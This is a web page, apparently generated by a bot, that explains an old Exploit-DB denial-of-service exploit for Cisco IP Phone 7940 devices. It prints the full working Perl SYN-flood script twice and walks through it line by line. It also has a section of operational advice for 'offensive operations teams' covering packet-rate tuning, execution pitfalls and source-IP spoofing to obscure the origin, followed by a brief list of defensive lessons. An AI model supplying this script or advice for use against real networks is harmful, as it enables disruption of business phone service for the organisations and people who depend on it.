By exploitdb papers bot•January 10, 2006•
papers
Cisco IP Phone 7940 Reboot Exploit Explained
Cisco IP Phone 7940 Reboot Exploit Explained
What this paper is
This paper describes a Denial of Service (DoS) vulnerability in Cisco IP Phone 7940 devices. The exploit causes the phone to reboot by sending a specific sequence of network packets. It targets a particular firmware version and protocol.
Simple technical breakdown
The exploit works by sending a large number of TCP SYN packets to the phone's web interface (port 80). These packets are crafted in a way that overwhelms the phone's network stack or a specific service handling these connections. The excessive load causes the phone's operating system or firmware to crash and reboot.
The script uses Perl to construct and send these packets. It allows customization of the source IP address, destination IP address, target port, the number of packets to send, and the delay between each packet.
Complete code and payload walkthrough
#!/usr/bin/perl
# This is made for trashing cisco 7940 ip phones. kokanin made/discovered this.
# A packetcount of 1000 and a packetdelay of 0.002 sent to port 80 makes my
# phone reboot - play with the settings and stuff. PRIVATE PRIVATE PRIVATE!!!
# not private anymore. Vulnerable phones are running ver. 7.0(2.0) using the skinny
# protocol - this is not for the SIP firmware.
use Net::RawIP;
use Time::HiRes;
$pkt = new Net::RawIP;
die "Usage $0 <src> <dst> <target port> <number of pkts> <packet delay>" unless ($ARGV[4]);
$pkt->set({
ip => {
saddr => $ARGV[0],
daddr => $ARGV[1]
},
tcp=> { dest => $ARGV[2],
syn => 1,
seq => 0,
ack => 0}
});
for(1..$ARGV[3]){ $pkt->set({tcp=>{source=>int(rand(65535))}});Time::HiRes::sleep($ARGV[4]); $pkt->send; };
# milw0rm.com [2006-01-10]Code Fragment/Block -> Practical Purpose
#!/usr/bin/perl: Shebang line, indicating the script should be executed with the Perl interpreter.# Comments: These lines provide context about the exploit's purpose, author, target, and specific conditions for successful exploitation (e.g., firmware version 7.0(2.0), Skinny protocol, port 80).use Net::RawIP;: Imports theNet::RawIPmodule, which is essential for crafting and sending raw IP packets at a low level. This allows for precise control over packet headers.use Time::HiRes;: Imports theTime::HiResmodule, which provides high-resolution time functions, specifically used here for precisesleepoperations between packet sends.$pkt = new Net::RawIP;: Initializes a newNet::RawIPobject. This object will be used to build and send the network packets.die "Usage $0 <src> <dst> <target port> <number of pkts> <packet delay>" unless ($ARGV[4]);: This is an argument validation check.$0: Represents the name of the script itself.$ARGV: An array containing the command-line arguments passed to the script.unless ($ARGV[4]): Checks if the 5th argument (index 4) is provided. If not, it prints the usage message and exits. This means all five arguments (src,dst,target port,number of pkts,packet delay) are required.
$pkt->set({ ... });: This block configures the network packet's headers.ip => { saddr => $ARGV[0], daddr => $ARGV[1] }: Sets the IP layer headers.saddr => $ARGV[0]: Sets the source IP address to the first command-line argument.daddr => $ARGV[1]: Sets the destination IP address to the second command-line argument.
tcp=> { dest => $ARGV[2], syn => 1, seq => 0, ack => 0}: Sets the TCP layer headers.dest => $ARGV[2]: Sets the destination TCP port to the third command-line argument.syn => 1: Sets the SYN flag in the TCP header to 1, indicating a SYN packet (the start of a TCP connection attempt).seq => 0: Sets the TCP sequence number to 0.ack => 0: Sets the TCP acknowledgment number to 0.
for(1..$ARGV[3]){ ... };: This loop iterates a specified number of times, controlled by the fourth command-line argument ($ARGV[3]).$pkt->set({tcp=>{source=>int(rand(65535))}});: Inside the loop, this line modifies the TCP header for each packet.source=>int(rand(65535)): Sets the source TCP port to a random integer between 0 and 65535. This is a common technique in DoS attacks to make it harder to filter or block based on source port and to potentially consume more resources on the target.
Time::HiRes::sleep($ARGV[4]);: Pauses execution for a duration specified by the fifth command-line argument ($ARGV[4]). This controls the rate at which packets are sent.$pkt->send;: Sends the constructed raw IP packet over the network.
# milw0rm.com [2006-01-10]: A comment indicating the source and publication date of the exploit.
Payload/Shellcode Explanation:
There is no explicit shellcode or payload bytes in this script. The "payload" is the crafted sequence of TCP SYN packets themselves, designed to trigger the vulnerability in the target device's network stack. The exploit relies on sending a high volume of these specific packets to cause a condition that leads to a reboot.
Practical details for offensive operations teams
- Required Access Level: Network access to the target IP phone's subnet is required. No prior authentication or user-level access to the phone is needed.
- Lab Preconditions:
- A Cisco IP Phone 7940 running firmware version 7.0(2.0) or a demonstrably vulnerable version using the Skinny protocol.
- Network connectivity between the attacker machine and the target phone.
- A Kali Linux or similar Linux distribution with Perl and the
Net::RawIPmodule installed (cpan Net::RawIP).
- Tooling Assumptions:
- Perl interpreter.
Net::RawIPPerl module.Time::HiResPerl module (usually included with Perl).- A network interface capable of sending raw packets.
- Execution Pitfalls:
- Firmware Version: The exploit is highly specific to the firmware version mentioned. Newer versions or SIP firmware will likely not be affected.
- Network Segmentation/Firewalls: Firewalls or Intrusion Detection/Prevention Systems (IDS/IPS) between the attacker and the target could detect and block the flood of SYN packets.
- Packet Rate: The
packet delayis crucial. Too fast a rate might be blocked; too slow might not overwhelm the device. The suggested0.002seconds is a starting point. - Source IP Spoofing: While the script uses the provided source IP, in a real-world scenario, spoofing the source IP might be considered to obscure the origin, but this can complicate receiving any potential (though unlikely in a DoS) ICMP responses.
- Target Port: The exploit targets port 80, which is typically the HTTP management interface. If this port is blocked or not used for management, the exploit will fail.
- Resource Exhaustion: The script sends raw packets. If the attacker's machine is not powerful enough or the network link is saturated, the packet sending might be unreliable.
- Planning Assumptions:
- The target device is reachable on the network.
- The target device is running the vulnerable firmware and protocol.
- The management interface (port 80) is accessible.
- The objective is to disrupt service (reboot the phone).
Where this was used and when
This exploit was published in January 2006. At that time, Cisco IP Phones were common in enterprise environments. Vulnerabilities like this were often discovered and exploited by security researchers and, unfortunately, by malicious actors to disrupt business communications. The specific mention of "milw0rm.com" indicates it was shared on a public exploit database, suggesting it was likely tested and potentially used in unauthorized activities shortly after its discovery.
Defensive lessons for modern teams
- Firmware Management: Regularly update firmware on all network devices, including IP phones, to patch known vulnerabilities. Vendor advisories should be closely monitored.
- Network Segmentation: Isolate critical devices like IP phones on separate network segments to limit the blast radius of any potential exploit.
- Firewall Rules: Implement strict firewall rules to only allow necessary traffic to and from IP phones. Block unnecessary ports and protocols.
- Intrusion Detection/Prevention Systems (IDS/IPS): Deploy and configure IDS/IPS to detect and potentially block patterns of suspicious network traffic, such as SYN floods or malformed packets targeting known vulnerable services.
- Protocol Awareness: Understand the protocols used by devices (e.g., Skinny vs. SIP for Cisco phones) and their associated vulnerabilities.
- Least Privilege: Ensure management interfaces are secured and accessible only from authorized management networks.
ASCII visual (if applicable)
This exploit is a direct network-to-device interaction. An ASCII visual can represent the packet flow.
+-----------------+ +-----------------+ +-------------------+
| Attacker Machine| ----> | Network Switch | ----> | Cisco IP Phone |
| (Perl Script) | | | | (7940, v7.0(2.0)) |
+-----------------+ +-----------------+ +-------------------+
| |
| Sends crafted TCP SYN packets | Receives packets
| (high volume, specific rate) | Overwhelms/crashes
| | Reboots
+-----------------------------------------------------+Source references
- Paper ID: 1411
- Paper Title: Cisco IP Phone 7940 - Reboot (Denial of Service)
- Author: kokanin
- Published: 2006-01-10
- Keywords: Hardware,dos
- Paper URL: https://www.exploit-db.com/papers/1411
- Raw URL: https://www.exploit-db.com/raw/1411
Original Exploit-DB Content (Verbatim)
#!/usr/bin/perl
# This is made for trashing cisco 7940 ip phones. kokanin made/discovered this.
# A packetcount of 1000 and a packetdelay of 0.002 sent to port 80 makes my
# phone reboot - play with the settings and stuff. PRIVATE PRIVATE PRIVATE!!!
# not private anymore. Vulnerable phones are running ver. 7.0(2.0) using the skinny
# protocol - this is not for the SIP firmware.
use Net::RawIP;
use Time::HiRes;
$pkt = new Net::RawIP;
die "Usage $0 <src> <dst> <target port> <number of pkts> <packet delay>" unless ($ARGV[4]);
$pkt->set({
ip => {
saddr => $ARGV[0],
daddr => $ARGV[1]
},
tcp=> { dest => $ARGV[2],
syn => 1,
seq => 0,
ack => 0}
});
for(1..$ARGV[3]){ $pkt->set({tcp=>{source=>int(rand(65535))}});Time::HiRes::sleep($ARGV[4]); $pkt->send; };
# milw0rm.com [2006-01-10]